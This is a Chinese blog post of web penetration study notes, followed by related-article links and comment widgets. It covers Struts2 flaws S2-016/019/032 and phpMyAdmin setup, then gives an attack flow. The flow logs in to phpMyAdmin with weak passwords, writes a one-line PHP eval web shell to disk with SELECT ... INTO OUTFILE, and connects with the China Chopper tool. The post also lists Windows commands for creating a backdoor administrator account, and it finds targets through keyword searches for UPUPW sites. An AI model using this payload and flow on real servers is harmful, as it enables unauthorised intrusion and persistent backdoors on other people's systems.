Web渗透学习(一)

最新推荐文章于 2025-11-07 08:45:00 发布
原创 最新推荐文章于 2025-11-07 08:45:00 发布 · 3.8k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透

什么是struts2?

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。其被普遍应用于阿里、京东等各大网站。

本次讲的struts2漏洞是什么?

  • S2-016
  • S2-019
  • S2-032

什么是phpMyAdmin?

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。

如何使用phpMyAdmin?

  • 下载phpMyAdmin,这是官网连接
  • 解压并备份
  • 找到config.sample.inc.php,改名为config.inc.php,用文本编辑器打开该文件,找到下列代码:
$cfg['blowfish_secret'] = ''

改为

$cfg['blowfish_secret'] = 'c4ca4238a0b923820dcc509a6f75849b';//一个长字符串密码就行
  • 进入apache的conf文件夹下,新建一个phpmyadmin.conf文件,文本编辑器打开,加入下列代码:
Alias /phpmyadmin "c:/phpMyAdmin/"
<Directory "c:/phpMyAdmin/">
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Require all granted
php_admin_value upload_max_filesize 128M
php_admin_value post_max_size 128M
php_admin_value max_execution_time 360
php_admin_value max_input_time 360
</Directory>
  • 在该文件夹内找到配置文件httdp.conf,用文本编辑器打开,在末尾增加一行
Include conf/phpmyadmin.conf

本次讲的phpMyAdmin漏洞是什么?

通过phpMyAdmin弱口令拿shell

本次使用的工具或方法是什么?

  • 工具:struts2漏洞利用工具、听潮URL采集工具
  • 方法:关键词搜索(UPUPW)、弱口令、

本次使用了哪些命令?其作用是什么?

命令代码
查看用户net user
新建用户net user 123 123 /add
提权localgroup administrators 123 /add
删除用户net user 123 /del
查看IPipconfig
查看端口netstat -abn

整理本次的攻击流程

  • 利用弱口令进入phpMyAdmin后台
  • 在sql中输入以下语句
SELECT '<?php @eval($_POST[xk]);?>'
INTO OUTFILE 'D://upupw//htdocs//xk.php'
  • 利用菜刀连接
  • 后续可利用小马或者大马完成渗透
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
杨秀璋的专栏
10-30 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,起进步。前文分享了Powershell基础入门知识,涉及条件语句、循环语句、数组、函数 、字符串操作、注册表访问等。这篇文章将分享Web渗透的第步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。
web渗透学习手册
热门推荐
渗透之路,攻防之间皆学问
03-04 1万+
依据多年的渗透测试项目经验及个人理解,对漏洞分类
超全的Web渗透自我学习资料合集(64篇).zip
09-30
超全的Web渗透学习资料合集,共64篇。 web渗透: web安全原则 web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 web渗透: 枚举web服务器应用 web渗透: 识别web应用框架 web渗透: 配置管理测试 web渗透: 身份管理测试 web渗透: 不安全的HTTP方法 web渗透: 登录认证安全测试 web渗透: 浏览器缓存攻击测试 web渗透: 目录遍历文件包含测试 web渗透: 目录浏览漏洞测试 web渗透: 越权漏洞 web渗透: 任意文件下载 web渗透: 跨站请求伪造(CSRF) web渗透: 服务端请求伪造攻击(SSRF) web渗透: 跨站脚本攻击(XSS) web渗透: HTTP Host头攻击 web渗透: SQL注入(上) web渗透: SQL注入(下) web渗透: XML注入攻击 web渗透: XXE外部实体注入 web渗透: 服务器端包含注入(SSI注入) web渗透: XPath注入 web渗透: 命令注入 web渗透: HTTP响应头拆分漏洞 web渗透: LDAP注入 web渗透: ORM注入 web渗透: Json劫持Json注入 web渗透: 宽字节注入 web渗透: 脆弱的通信加密算法 web渗透: Padding Oracle攻击 web渗透: 未加密信道发送敏感数据 web渗透: 业务逻辑数据验证 web渗透: 伪造请求 web渗透: 验证码功能缺陷 web渗透: 竞争并发漏洞 web渗透: IMAPSMTP注入 web渗透: 本地文件包含远程文件包含 web渗透: 文件上传漏洞 web渗透: web服务器控制台地址泄漏 web渗透: 报错信息测试 web渗透: 不安全的对象引用 web渗透: 基于DOM的XSS跨站 web渗透: 堆栈轨迹测试 web渗透: 常见的数据信息泄露 web渗透: web消息漏洞 web渗透: WebSockets安全测试 web渗透: 异常信息泄漏 web渗透: 防御应用程序滥用 web渗透: 客户端资源处理漏洞 web渗透: HTML注入 web渗透: Flash跨域访问漏洞 web渗透: 客户端URL重定向 web渗透: DNS域传送漏洞 web渗透: 服务器多余端口开放 web渗透: 本地存储安全 web渗透: web服务器解析漏洞 web渗透: JavaScript注入漏洞 web渗透: CSS注入 web渗透: 会话固化漏洞 web渗透: 常见的WAF绕过方法
【安全】Web渗透测试(全流程)零基础入门到精通,收藏这篇就够了
最新发布
Python_0011的博客
11-07 1406
XSS 让攻击者能够在受害者的浏览器中执行脚本,并劫持用户会话、破坏网站或将用户重定向到恶意站点。CSRF,全称为Cross-Site Request Forgery,跨站请求伪造,是种网络攻击方式,它可以在用户毫不知情的情况下,以用户的名义伪造请求发送给被攻击站点,从而在未授权的情况下进行权限保护内的操作,如修改密码,转账等。些网站由于业务需求,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意的文件,可以是源代码文件、敏感文件等。
WEB安全渗透课程ppt
01-04
WEB安全渗透课程ppt,cisp-pte教材,包含16个章节,涵盖日常常用漏洞解析
web学习过程1
zcf9024的博客
03-05 565
今天的学习初步了解了web的标准构成, HTML 用于超文本,标记语言,网页布局,整体构架,内容。 CSS 是页面更加的美观,可以对页面的字体,颜色,对齐方式,背景颜色等进行更改,使页面美观。 JavaScript 用于页面的动态效果:轮播图,分类展示子分类的效果,按钮的点击操作。 些常见的标签: :用于划分区域。 :划分段落。 ~:标题的从大到小。 ...
web后端学习过程中技巧总结(持续更新。。。)
Mus_Li的博客
07-25 1047
Web前端和后端学习过程中的遇到的问题汇总
Web渗透学习笔记.zip
11-29
综合以上内容,我们可以看出“Web渗透学习笔记.zip”是个全面、系统的渗透测试学习资料集合,它不仅包含了基础知识与技术工具的学习,还注重实战技能的培养和安全意识的提升。通过对该压缩包内资源的学习与实践,...
新手适用的Web渗透测试靶机实践
06-17
Web渗透测试靶机是种专为网络安全新手设计的学习平台,它模拟真实的Web应用程序环境,让学习者能够在安全可控的条件下练习渗透测试技术。这种靶机通常包含多种存在不同安全漏洞Web应用,学习者可以通过查找和...
精选资源
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
Web学习历程(
weixin_44096353的博客
09-13 236
HTML学习历程() 初识HTML HTML 全称为 HyperText Markup Language,译为超文本标记语言。 HTML 不是种编程语言,是种描述性的标记语言。 作用:HTML是负责描述文档语义的语言。 概念:超文本 所谓的超文本,有两层含义: (1)图片、音频、视频、动画、多媒体等内容,成为超文本,因为它们超出了文本的限制。 (2)不仅如此,它还可以从个文件跳转到另个文件,与世界各地主机的文件进行连接。即:超级链接文本。 概念:标记语言 HTML 不是种编程语言,是种描述性的
JavaWeb学习过程
xxy1312的博客
06-06 374
JavaWeb 动态web [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MxvCPXRT-1622964828729)(C:\Users\10586\AppData\Roaming\Typora\typora-user-images\image-20210520205235520.png)] Tomcat conf 配置文件 server.xml 修改端口号 <Connector port="8080" protocol="HTTP/1.1"
Web前端开发的学习过程
weixin_30244681的博客
05-27 175
2018年 5月27日 开始在MDN上学习HTML/CSS/JavaScript。——6月18日 基本学完MDN的“学习Web开发”的HTML/CSS/JavaScript部分。 6月9日 开始在IFE(百度前端技术学院)上做任务。——8月11日 基本做完(除了最后2个任务,不过最后2个任务我也学习了其中的阅读材料)。 6月11日 开始学PS切图。——6月11日 学会。 6月18...
Web渗透学习路线
tasty
09-09 7301
Web安全相关概念 熟悉基本概念(SQL注入、上传、XSS、CSRF、句话木马等)。 通过关键字(SQL注入、上传、XSS、CSRF、句话木马等)进行Google/SecWiki; 阅读《精通脚本黑客》,虽然很旧也有错误,但是入门还是可以的; 看渗透笔记/视频,了解渗透实战的整个过程,可以Google(渗透笔记、渗透过程、入侵过程等); 3周   熟悉渗透相关工具 熟悉AW
如何学习web渗透
doumeiyounitian的博客
04-06 215
为什么零基础的我,学习web渗透总是头雾水,总是感觉学不明白,好多问题也想不明白,零基础的学习,好无语,有没有大佬给我讲讲,带带我,哎我太难了! 努力也许没错,懵逼更是种最无语的状态! ...
渗透学习
weixin_43074116的博客
09-05 1230
总论 作为只信息萌新,我爱好IT,立志当名白帽,却直在开发圈内兜兜转转,被各种语言学习迷昏了头,在渗透学习的门前久过而不入。 现在细细反思,主要是以下几点原因: 担心渗透学习技术门槛太高,害怕自己没有足够的知识储备看不懂教材和论坛; 因为畏难而退缩,退而求其次去跟风学习些开发的皮毛内容; 进入大学之后由学习网络安全的前辈指点,终于醒悟: 渗透学习需要对计算机有定了解,但不...
2021web安全最全学习路线,从入门到入职(含书籍、工具包)
weixin_54787877的博客
03-13 9624
本次写的是篇如何通过针对性系统学习Web安全或者说如何能成为渗透测试人员(有疑问或者错误的地方还望大家多多指正)。 相信大家每学习样东西的时候都是存在种很迷茫的心态(包括我自己),上网找视频找文章找资料学习得零零散散,最后还是浪费时间只得到身三脚猫功夫。只有成体系的去学习、让自己的知识由点变成面,这样才能变得更强(文末附上书籍和工具包,希望大家查漏补缺,强中强)! Web 安全 主要包括 HTTP 协议、注入漏洞、XSS 漏洞、SSRF 漏洞、CSRF 漏洞、文件处理漏洞、访问控制漏洞、会
web渗透测试培训,如何做信息收集?
dzqxwzoe的博客
10-01 175
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值